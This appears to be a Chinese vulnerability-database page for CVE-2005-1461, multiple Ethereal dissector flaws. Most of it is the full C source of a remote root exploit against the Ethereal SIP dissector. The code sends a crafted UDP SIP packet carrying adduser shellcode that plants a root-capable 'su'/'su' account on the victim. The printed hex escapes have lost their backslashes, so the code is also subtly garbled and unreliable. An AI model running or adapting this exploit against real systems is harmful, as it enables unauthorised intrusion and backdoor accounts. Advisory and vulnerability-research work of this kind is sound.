Ethereal多个协议分析处理模块漏洞

Ethereal多个协议分析处理模块漏洞

漏洞ID 1108829 漏洞类型 缓冲区溢出
发布时间 2005-05-31 更新时间 2005-10-20
图片[1]-Ethereal多个协议分析处理模块漏洞-安全小百科CVE编号 CVE-2005-1461
图片[2]-Ethereal多个协议分析处理模块漏洞-安全小百科CNNVD-ID CNNVD-200505-929
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-929
|漏洞详情
Ethereal是一款非常流行的网络协议分析工具。Ethereal厂商报告了各种协议处理模块中的多个漏洞,包括:-缓冲区溢出漏洞-格式串漏洞-空指针引用拒绝服务漏洞-分段错误拒绝服务漏洞-死循环漏洞-内存耗尽拒绝服务漏洞-双重释放漏洞-未明的拒绝服务漏洞这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
|漏洞EXP
/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
*
* Advisory: 
* http://www.ethereal.com/appnotes/enpa-sa-00019.html
* 
* produced by Team W00dp3ck3r:
* fraukx41iser
* mag00n
* s00n
* thorben
* 
* Notes:
* tested on Debian Sarge 
* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
*
* tested version of ethereal:
* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
* (./configure, make, make install ;))
* 
* victim has to switch from normal user to root using "su -" 
* the exploit adds a user named "su" with password "su" on the victim host
* 
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>


unsigned char sip_header[] = 
"x4fx50x54x49x4fx4ex53x20x73x69x70x3ax68x61x63"
"x6bx20x53x49x50x2fx32x2ex30x0ax56x69x61x3ax20"
"x53x49x50x2fx32x2ex30x2fx55x44x50x20x63x70x63"
"x31x2dx6dx61x72x73x31x2dx33x2dx30x2dx63x75x73"
"x74x32x32x35x2ex6dx69x64x64x2ex63x61x62x6cx65"
"x2ex6ex74x6cx2ex63x6fx6dx3ax35x35x31x31x38x3b"
"x72x70x6fx72x74x0dx0ax56x69x61x3ax20x53x49x50"
"x2fx32x2ex30x2fx55x44x50x20x68x61x63x6bx3ax39"
"x0ax46x72x6fx6dx3ax20x73x69x70x3ax68x61x63x6b"
"x3bx74x61x67x3dx36x31x35x61x65x37x37x30x0ax54"
"x6fx3ax20x73x69x70x3ax68x61x63x6b";

unsigned char callid[] =
"x0ax43x61x6cx6cx2dx49x44x3ax20";


/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 
2 parts because one buffer was too small. thx to http://metasploit.com */
unsigned char shellcode[] =
"x31xc9x83xe9xe9xd9xeexd9x74x24xf4x5bx81x73x13xa5"
"xb7x95xbbx83xebxfcxe2xf4x94x7ex1cx70xcfxf1xcdx76"
"x25xddx90xe3x94x7exc4xd3xd6xc4xe2xdfxcdx98xbaxcb"
"xc4xdfxbaxdexd1xd4x1cx58xe4x02x91x76x25x24x7dx9b"
"xa5xb7x95xc8xd0x8dxd4xfaxdfxf2xacxd4xd4xf9xddxed"
"xf5x82xe6x81x95x8dxa5x81x9fx98xafx94xc7xdexfbx94"
"xd6xdfx9fxe2x2exe6";


unsigned char cseq[] = 
"x0ax43x53x65x71x3ax20";

/* the malformed cseq method field. the buffer has a size of 16 byte. you need 
48 byte to overwrite the return address. the first byte is checked isalpha(), 
so we splitted the shellcode in a way that the first char of cseq_method passes
the isalpha() check. */ 
unsigned char cseq_method[] = 
"x69xd1xa1xefx58x3bxcfxb6xcdx76x25xb7x95xbb";


/* needed to be a fully valid sip packet */
unsigned char sip_footer[] =
"x0ax43x6fx6ex74x61x63x74x3ax20x68x61x63x6bx3a"
"x39x0ax43x6fx6ex74x65x6ex74x2dx4cx65x6ex67x74"
"x68x3ax20x30x0ax4dx61x78x2dx46x6fx72x77x61x72"
"x64x73x3ax20x37x30x0ax55x73x65x72x2dx41x67x65"
"x6ex74x3ax20x57x30x30x64x70x33x63x6bx33x72x20"
"x0a";



int main(int argc, char * argv[]) {
unsigned int i, offset, ret, p_addr;
struct sockaddr_in dest;
struct hostent *he;
int sock, slen = sizeof(struct sockaddr);
unsigned char buffer[2048];

// help output
if(argc < 3) {
printf("correct syntax: %s <flag> <host> n", argv[0]);
printf("possible flag: n");
printf("1 the ethereal user has started tethereal" 
"with full path as root n");
printf("2 the ethereal user has started tethereal" 
"without directorypath as root n");
return 1;
}

// p_addr may differ on other systems ;)
if (argv[1][0] == '1') {
p_addr = 0xbffee328;
}

if (argv[1][0] == '2') {
p_addr = 0xbffee338;
}

// destination-ip check
if((he = gethostbyname(argv[2])) == NULL) {
printf("[!] Couldn't resolve %sn", argv[2]);
return 1;
}

// open socket
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("socket()");
return 1;
}

// set packet parameters
dest.sin_port = htons(5060);
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)he->h_addr);

// set the returnaddress (may differ on other systems)
ret = 0xbffee240; 


//// generate a buffer containing the data ////
offset = 0;

// set all values of the buffer to 0x0
memset(buffer, 0x0, sizeof(buffer));

// copy the header into the buffer
memcpy(buffer+offset, sip_header, sizeof(sip_header)); 
offset += sizeof(sip_header) -1;

// concat the callid into the buffer
memcpy(buffer+offset, callid, sizeof(callid)); 
offset += sizeof(callid) -1;

// add the callid-value (nop+shellcode)
i = 128 - sizeof(shellcode) +1; 
memset(buffer+offset, 0x90, i);
offset += i;

// insert shellcode into buffer
memcpy(buffer+offset, shellcode, sizeof(shellcode));
offset += sizeof(shellcode) -1; 


// concat the cseq
memcpy(buffer+offset, cseq, sizeof(cseq)); 
offset += sizeof(cseq) -1;

// generate the part, which causes the overflow (=cseq-method)
memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 
offset += sizeof(cseq_method) -1; 

// fill the rest of cseq_method with A
memset(buffer+offset, 0x41, 30);
offset += 30; 
// write return address
*(long *)&buffer[offset] = ret; 
offset += 4;

// repair the first pointer after ret- address
*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
offset += 4;
// repair second pointer after ret- address 
*(long *)&buffer[offset] = p_addr;
offset += 4; 

// the finalising part of the message
memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

// send the buffer to the victim
if (sendto(sock, buffer, sizeof(buffer), 0, 
(struct sockaddr *)&dest, slen)== -1) {
printf("[!] Error sending packet!n");
return 1;
}

// DEBUG //
// printf("%sn", buffer);

printf("[*] dark W00dp3ck3r packet sent!n");
close(sock);
return 0;

}

// milw0rm.com [2005-05-31]
|参考资料

来源:www.ethereal.com
链接:http://www.ethereal.com/news/item_20050504_01.html
来源:www.ethereal.com
链接:http://www.ethereal.com/appnotes/enpa-sa-00019.html
来源:BID
名称:13504
链接:http://www.securityfocus.com/bid/13504
来源:REDHAT
名称:RHSA-2005:427
链接:http://www.redhat.com/support/errata/RHSA-2005-427.html
来源:FEDORA
名称:FLSA-2006:152922
链接:http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
来源:CONECTIVA
名称:CLSA-2005:963
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000963

相关推荐: Symantec Brightmail AntiSpam Quarantine Multiple Remote Denial of Service Vulnerabilities

Symantec Brightmail AntiSpam Quarantine Multiple Remote Denial of Service Vulnerabilities 漏洞ID 1097409 漏洞类型 Failure to Handle Exce…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享